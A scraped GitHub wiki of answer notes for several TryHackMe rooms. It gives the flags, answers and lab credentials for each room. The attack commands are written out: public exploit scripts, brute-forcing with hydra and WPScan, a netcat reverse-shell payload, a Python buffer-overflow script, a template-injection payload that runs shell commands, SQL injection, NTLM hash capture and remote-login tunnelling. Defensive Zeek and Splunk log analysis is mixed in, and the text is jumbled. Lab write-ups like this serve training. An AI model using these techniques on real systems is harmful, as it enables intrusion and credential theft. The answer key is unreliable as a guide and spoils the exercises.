TryHackMe ‐ All Answers - vietkim027/thm GitHub Wiki

http://10.10.174.138:9090/40b5dffec4e39b7a3e9d261d2fc4a038/

THM{SSTI_AND_BUFFER_OVERFLOW_W4S_HERE} THM{F4KE_PIP_PACKAGE_INSTALL}2030 https://tryhackme.com/room/easyctf

Q1 nmap -T4 10.10.22.177

Q2 nmap -A -p21,80,2222 -T4 10.10.22.177

Q3 dirb http://10.10.22.177 /usr/share/wordlists/dirb/big.txt http://10.10.22.177/simple CVE-2019-9053

Q4 sqli

Q5 curl https://github.com/e-renna/CVE-2019-9053/raw/master/exploit.py

python3 exploit.py -u http://10.10.22.177/simple –crack -w /usr/share/wordlists/SecLists/Passwords/Common-Credentials/best110.txt then hashcat -m 20 '0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2' .\wordlist\rockyou.txt

secret

Q6 ssh -p 2222 [email protected] ssh

Q7 G00d j0b, keep up!

Q8 sunbath

Q9 sudo -l

vim sudo vim -c ‘:!/bin/sh’

W3ll d0n3. You made it!

Fuel CMS 1.4 CVE-2018-16763 nano exploit.py python3 exploit.py -u http://10.10.12.223 cd /usr/share/exploits/vulnerabilitiescapstone nc -nlvp 8081 python3 exploit.py 10.10.12.223 10.10.12.223:8081 cd /home/ubuntu

nmap -sV --script vuln [IP] msfconsole search heartbleed use auxiliary/scanner/ssl/openssl_heartbleed show options set rhost [IP] set verbose true run run

https://tryhackme.com/room/reverselfiles Task 1 file crackme1 chmod +x crackme1 ./crackme1

Task 2 strings crackme2 ./crackme2 super_secret_password

Task 3 strings crackme3 or r2 -A crackme3 echo HashHere | base64 -d

Task 4 Method 1 r2 -A crackme4 pass px @ rax

Method 2 strings crackme4

Use radare2 r2 -d ./crackme4 password

aa afl | grep main pdf @main pdf @sym.compare_pwd db 0x0040006cf dc px @ rbp-0x20

Task 5 strings crackme5 Method 1 r2 -A crackme5 px @ rdx

Method 2 r2 -d ./crackme5 aa afl | grep main pdf @main pdf @sym.compare_pwd db 0x004000829 db 0x004000834 dc px @ rbp-0x30 px @ rbp-0x50

./crackme5 OfdlDSA|3tXb32~X3tX@sX`4tXtz

Task 6 chmod +x crackme6 Use Ghidra https://ghidra-sre.org/ as a Decompiler

Go to main function, it call compare_pwd

Looking at compate_pwd, Decompile my_secure_test.

We get 313333375f707764 Visit https://toolbox.googleapps.com/apps/encode_decode/

Then choose Hex Decode

Task 7 Run Ghidra, see main function, local 14 == 0x7a69. Use https://www.convzone.com/hex-to-decimal/ Convert this hex to dec is 31337. ./crackme7 31337

Task 8 Run Ghidra, see main function, iVar2 == -0x35010ff3. Use https://www.convzone.com/hex-to-decimal/ Convert this hex to dec is -889262067. ./crackme7 -889262067

2438Investigate the dns-tunneling.pcap file. Investigate the dns.log file. What is the number of DNS records linked to the IPv6 address?

cd anomalous-dns/ zeek -r dns-tunneling.pcap cat dns.log | less cat dns.log | zeek-cut qtype_name | grep "AAAA" | uniq -c A: 320

Investigate the conn.log file. What is the longest connection duration? cat conn.log | zeek-cut duration | sort -n | tail -1 A: 9.420791

There are a massive amount of DNS queries sent to the same domain. This is abnormal. Let’s find out which hosts are involved in this activity. Investigate the conn.log file. What is the IP address of the source host? cat conn.log | zeek-cut id.orig_h id.resp_h | sort -n | uniq -c A: 10.20.57.3

Task 3 cd phishing/ zeek -r phishing.pcap Investigate the logs. What is the suspicious source address? Enter your answer in defanged format.

cat dhcp.log | less cat dhcp.log | zeek-cut client_addr | uniq | sed -e 's/./[.]/g' Answer: 10[.]6[.]27[.]102

Investigate the malicious document in VirusTotal. What kind of file is associated with the malicious document? zeek -C -r phishing.pcap hash-demo.zeek ls cat files.log | less cat files.log | zeek-cut mime_type md5 | grep "word"

virustotal.org b5243ec1df7d1d5304189e7db2744128 Answer: VBA

Investigate the extracted malicious .exe file. What is the given file name in Virustotal? cat files.log | zeek-cut mime_type md5 | grep "exe" PleaseWaitWindow.exe

Investigate the malicious .exe file in VirusTotal. What is the contacted domain name? Enter your answer in defanged format. echo hopto.org | sed -e 's/./[.]/g' hopto[.]org

Investigate the http.log file. What is the request name of the downloaded malicious .exe file? cat http.log | grep "exe" knr.exe

Task 4 Investigate the log4shell.pcapng file with detection-log4j.zeek script. Investigate the signature.log file. What is the number of signature hits?

cd log4j/ zeek -C -r log4shell.pcapng detection-log4j.zeek cat signatures.log | less cat signatures.log | zeek-cut note | uniq -c 3

Investigate the http.log file. Which tool is used for scanning? cat http.log | less cat http.log | zeek-cut user_agent | sort | uniq Nmap

Investigate the http.log file. What is the extension of the exploit file? cat http.log | zeek-cut uri | sort | uniq .class

Investigate the log4j.log file. Decode the base64 commands. What is the name of the created file? cat log4j.log | zeek-cut uri | sort -nr | uniq echo dG91Y2ggL3RtcC9wd25lZAo= | base64 -d

pwned

nmap -open 10.10.112.42

Hidden TAG Header: curl 10.10.112.42 -I

SSH Flag nc 10.10.112.42 22

FTP: nmap -T4 -sV -p 22,139,10021 10.10.112.42

hydra -l quinn -P /usr/share/wordlists/rockyou.txt 10.10.112.42 ftp -s 10021

ftp 10.10.112.42 10021

10.10.112.42:8080 in a web browser nmap -sN 10.10.112.42

Question 1

What does SMB stand for? Server Message Block

Question 2 What type of protocol is SMB? response-request

Question 3 What do clients connect to servers using? TCP/IP

Question 4 What systems does Samba run on? Unix

Task 3 Conduct an Nmap scan of your choosing. How many ports are open? 3

Question 2 What ports is SMB running on? 139/445

Let’s get started with enum4linux, conduct a full basic enumeration. For starters, what is the workgroup name?

nmap -A IP enum4linux -a IP Answer: WORKGROUP

Question 4 What comes up as the name of the machine? nmap -A -p- IP polosm

Question 5 What operating system version is running? (Check enum4linux above) 6.1

Question 6 What share sticks out as something we might want to investigate? (Check enum4linux above) Ans: profiles

Task 4 Question 1

What would be the correct syntax to access an SMB share called “secret” as user “suit” on a machine with the IP 10.10.115.90 on the default port?

smbcliet //10.10.115.90/secret -U suit -p 445

4.2 smbclient //10.10.115.90/profiles -p 445 (anonymous) Y

4.3, 4.4 smb: >ls

Great! Have a look around for any interesting documents that could contain valuable information. Who can we assume this profile folder belongs to? john cactus

What service has been configured to allow him to work from home? SSH

Okay! Now we know this, what directory on the share should we look in? (command: ls) .ssh

This directory contains authentication keys that allow users to authenticate themselves on and then access a server. Which of these keys is most valuable to us? cd .ssh ls Ans: id_rsa

What is the smb.txt flag? get .ssh/id_rsa id_rsa

cd .ssh

ls mget id_rs*

New Terminal chmod 600 id_rsa cat id_rsa.pub ssh -i id_rsa [email protected] ls cat smb.txt

Task 5 Question 1

What is Telnet?

Application protocol

Question 2

What has slowly replaced Telnet?

SSH

Question 3

How would you connect to a Telnet server with the IP 10.10.10.3 on port 23?

telnet 10.10.10.3 23

Question 4

The lack of what means that all Telnet communication is in plaintext?

Encryption

Task 6 nmap -T4 -A -p- 10.10.115.90 How many ports are open on the target machine?

uestion 2

What port is this? Note: This is asking which port is open.

8012

Question 3

This port is unassigned but still lists the protocol it’s using; what protocol is this?

TCP

Question 4

Now re-run the Nmap scan, without the -p- tag; how many ports show up as open? nmap -T4 -A 10.10.115.90 0

Question 6

Based on the title returned to us, what do we think this port could be used for? A backdoor

Who could it belong to? Gathering possible usernames is an essential step in an enumeration. Skidy

Task 7 (Keep This Task, Don't Exit terminal) telnet 10.10.115.90 8012 Great! It’s an open telnet connection! What welcome message do we receive? Ans: SKIDY’S BACKDOOR.

(Keep This Task, Don't Exit terminal)

Let’s try executing some commands. Do we get a return on any input we enter into the telnet session? (Y/N) Ans: N

sudo tcpdump IP proto \icmp -i eth0 .RUN ping 10.10.115.90 -c 1

Do we receive any pings? Note, you need to preface this with .RUN (Y/N) Y

msfvenom -p cmd/unix/reverse_netcat lhost=10.10.115.90 lport=4444 R Ans: mkfifo

Open new Terminal ((Keep This Task, Don't Exit terminal)) nc -lvp 4444

(Keep This Task, Don't Exit terminal)

ls cat flag.txt

Task 8 FTP Question 1

What communication model does FTP use? Client-server

Question 2 What’s the standard FTP port? 21

Question 3 How many modes of FTP connection are there? 2

Task 9 Enum FTP How many ports are open on the target machine? nmap -A -p- 10.10.115.90 Ans: 2

Question 2 What port is FTP running on? 21

Question 3 What variant of FTP is running on it? export ip=10.10.115.90 nmap -sV -oN nmap-$ip.out $ip cat nmap-$ip.out | grep open

Q4 What is the name of the file in the anonymous FTP directory?

ftp IP anonymous Enter Ans: PUBLIC_NOTICE.txt

Q5 What do we think a possible username could be? get PUBLIC_NOTICE.txt Ans: mike

T10 hydra -t 4 -l mike -P /usr/share/wordlists/rockyou.txt -vV 10.10.16.71 ftp

nmap 10.10.67.22 nmap -sC -p135,443,445 IP -oN services_scan.txt sudo nano etc/hosts Visit https://set.windcorp.thm

gobuster dir -u https://set.windcorp.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k

gobuster dir -u https://set.windcorp.thm/assets -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k

View page source https://set.windcorp.thm/assets/js/search.js https://set.windcorp.thm/assets/data/users.xml

curl -k https://set.windcorp.thm/assets/data/users.xml -o user.xml

Extracting the usernames from users.xml file

xmllint --xpath "//row/email" users.xml | sed -e 's///g' | sed -e 's/</email>//g' | sed -e 's/@windcorp.thm//g'>users.txt

brute force valid accounts

gobuster dir -k -u https://set.windcorp.thm/ -w /usr/share/dirbuster/wordlists/directory-list-1.0.txt -x txt,asp,aspx,html -q -t 50 -o gobuster_dir.txt

myrtleowe:Passw@rd

Listing all shares:

smbclient -L \set.windcorp.thm -U myrtleowe

smbclient \\10.10.67.22\Files -U myrtleowe

ls get Info.txt

Task 2 cd to /tools/mskink ./mslink -l vietkim -n shortcut -i \\10.10.67.22\vietkim -o shortcut.lnk

zip myfile.zip shortcut.lnk

responder -I tun0

Upload file to share smbclient //10.10.67.22/Files -U myrtleowe put myfile.zip exit

sudo python3 /opt/impacket/examples/smbserver.py -smb2support share . User MichelleWat Password: !!!MICKEYmouse

Install evil-winrm tool

gem install evil-winrm

evil-winrm - i 10.10.67.22 -u MichelleWat -p '!!!MICKEYmouse'

cd Desktop dir type Flag2.txt

Don't Exit this Windows

Task3 netstat -ao get-process Port 2805 attached to the process with PID 3524 Get-Process -Id 3524 cd "Veeam ONE Agent" (get-item Veeam.One.Agent.Service.exe).versioninfo.fileversion9.5.4.4566 or Invoke-WebRequest -Uri http://10.10.67.22/plink.exe -Outfile plink.exe echo y|& ./plink.exe -ssh -l attacker -pw s3cr3t -N -R 10.10.67.22:2805:127.0.0.1:2805 10.10.67.22

In Linux Command sudo python3 /opt/impacket/examples/smbserver.py -smb2support -username fun -password fun share

nc -lnvp 4444 cd /Desktop

python -m SimpleHTTPServer 80

nmap -p2805 localhost

set rhosts 127.0.0.1 options run2422 https://tryhackme.com/room/nonamectf

sudo nano buf.py import telnetlib import argparse

parser = argparse.ArgumentParser(description="BOF Exploit") parser.add_argument("host", help="The host IP address") parser.add_argument("port", help="The host port") args=parser.parse_args()

#Read and write def read(end_text): tn.read_until(end_text.encode())

def write(text): tn.write(("{0}\n".format(text)).encode()) #Connect tn = telnetlib.Telnet(args.host, args.port)

#Register/Login for i in range(1,3): read("4") #Listen for the end of the welcome message write(str(i)) #Pick an option (1 the first time, 2 the second) read(":") #Wait for the end of the username prompt write("jesus") #Enter Username read(":") #Wait for the end of the password prompt write("soon") #Enter password

#store buffer read("4") #Listen for the end of the welcome message write("4") #Pick option 4 to store a buffer read(":") #Listen for the end of the buffer prompt write("A"*1998) #Calculate and store the buffer

#complete overflow read("4") #Listen for the end of the welcome message write("3") #Pick option 3 to receive our secret directory read("\n") #Work around to get rid of the newline preceeding response print(tn.read_until("\n".encode()).decode()) #Output the directory

python3 bof.py 10.10.174.138 2222

http://10.10.174.138:9090/40b5dffec4e39b7a3e9d261d2fc4a038/

http://10.10.174.138:9090/40b5dffec4e39b7a3e9d261d2fc4a038/?hackme=whoami

http://10.10.174.138:9090/40b5dffec4e39b7a3e9d261d2fc4a038/?hackme={{7*7}}

http://10.10.174.138:9090/40b5dffec4e39b7a3e9d261d2fc4a038/?hackme={%%20import%20os%20%}{{%20os.popen(%22whoami%22).read()%20}}

THM{SSTI_AND_BUFFER_OVERFLOW_W4S_HERE} THN{F4KE_PIP_PACKAGE_INSTALL}Q: How many events were returned for the month of March 2022?

1482

Question: What is the IP associated with the suspected user in the logs? 192.166.65.54

Q: The user’s machine used a legit windows binary to download a file from the C2 server. What is the name of the binary? bitsadmin

Q: The infected machine connected with a famous filesharing site in this period, which also acts as a C2 server used by the malware authors to communicate. What is the name of the filesharing site? pastebin.com

Q: What is the full URL of the C2 to which the infected host is connected? pastebin.com/yTg0Ah6a

Q: A file was accessed on the filesharing site. What is the name of the file accessed? secret.txt

Q: The file contains a secret code with the format THM{_____}.

THM{SECRET_CODE}

Slunk How many events were collected and Ingested in the index main? index="main" A: 12256

“On one of the infected hosts, the adversary was successful in creating a backdoor user. What is the new username?” Cmd: index="main" EventID="4720" A: A1berto

“On the same host, a registry key was also updated regarding the new backdoor user. What is the full path of that registry key?” Cmd: index="main" EventID="13" a1berto A: HKLM\SAM\SAM\Domains\Account\Users\Names\A1berto

“Examine the logs and identify the user that the adversary was trying to impersonate.” Cmd: index="main" A: Cybertees\A1berto

“What is the command used to add a backdoor user from a remote computer?” Cmd: index="main" EvenID="1" A: C:\windows\System32\Wbem\WMIC.exe” /node:WORKSTATION6 process call create “net user /add A1berto paw0rd1

“How many times was the login attempt from the backdoor user observed during the investigation?” Cmd: index="main" User="A1berto" A: 0 logons

“What is the name of the infected host on which suspicious Powershell commands were executed?” Cmd: index="main" powershell A: James.Browne

“PowerShell logging is enabled on this device. How many events were logged for the malicious PowerShell execution?” index="main" EventID="4103" 79

“An encoded Powershell script from the infected host initiated a web request. What is the full URL?” C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noP -sta -w 1 -enc

Linux terminal: echo $STRING > base64.txt && base64 --decode base64.txt

$ser=$([TeXT.ENCodiNG]::UnicodE.GetStriNG([CoNVeRT]::FroMBASe64StRInG('aAB0AHQAcAA6AC8ALwAxADAALgAxADAALgAxADAALgA1AA==')));$t='/news.php'

hxxp[://]10[.]10[.]10[.]5/news[.]php

',nickName=(SELECT group_concat(profileID || "," || id || "," || author || "," || secret || ":") from secrets),email=' Task 6 echo '10.10.152.33 webenum.thm' | sudo tee -a /etc/hosts

gobuster dir -u http://webenum.thm/
-w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
-t128

Flag in webenum.thm/VIDEO/flag.php

Virtual Host: gobuster vhost -u http://webenum.thm/ -w DNSsubdomains-top1million-5000.txt -t128

echo '10.10.137.133 learning.webenum.thm' | sudo tee -a /etc/hosts echo '10.10.137.133 products.webenum.thm' | sudo tee -a /etc/hosts

gobuster dir -u http://products.webenum.thm/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -x txt -t128

Task 8 What would be the full URL for the theme "twentynineteen" installed on the WordPress site: "http://cmnatics.playground" A: http://cmnatics.playground/wp-content/themes/twentynineteen

What argument would we provide to enumerate a WordPress site? A: enumerate

What is the name of the other aggressiveness profile that we can use in our WPScan command? A: passive

Task 9 echo '10.10.137.133 wpscan.thm' | sudo tee -a /etc/hosts

wpscan --url wpscan.thm -e t

Enumerate the site, what is the name of the theme that is detected as running? A: twentynineteen

WPScan says that this theme is out of date, what does it suggest is the number of the latest version? A: 2.0

Enumerate the site, what is the name of the plugin that WPScan has found? wpscan --url wpscan.thm -e p A: nextgen-gallery

Enumerate the site, what username can WPScan find? wpscan --url wpscan.thm -e u A: Phreakazoid

Construct a WPScan command to brute-force the site with this username, using the rockyou wordlist as the password list. What is the password to this user? wpscan --url wpscan.thm --usernames phreakazoid --passwords usr/share/wordlists/rockyou.txt A: linkinpark

Task 11 What argument would we use if we wanted to scan port 80 and 8080 on a host? -p 80,8080

What argument would we use if we wanted to see any cookies given by the web server? -Display 2

Task 12 What is the name & version of the web server that Nikto has determined running on port 80? nikto -h 10.10.137.133 -p 8080

Apache/2.4.7

There is another web server running on another port. What is the name & version of this web server? nmap -n -sV 10.10.137.133

Apache-Coyote/1.1

What is the name of the Cookie that this JBoss server gives? nikto -h 10.10.137.133 -p -Display 2 JSESSIONID

TryHackMe ‐ All Answers - vietkim027/thm GitHub Wiki

⚠️ **GitHub.com Fallback** ⚠️

⚠️ GitHub.com Fallback ⚠️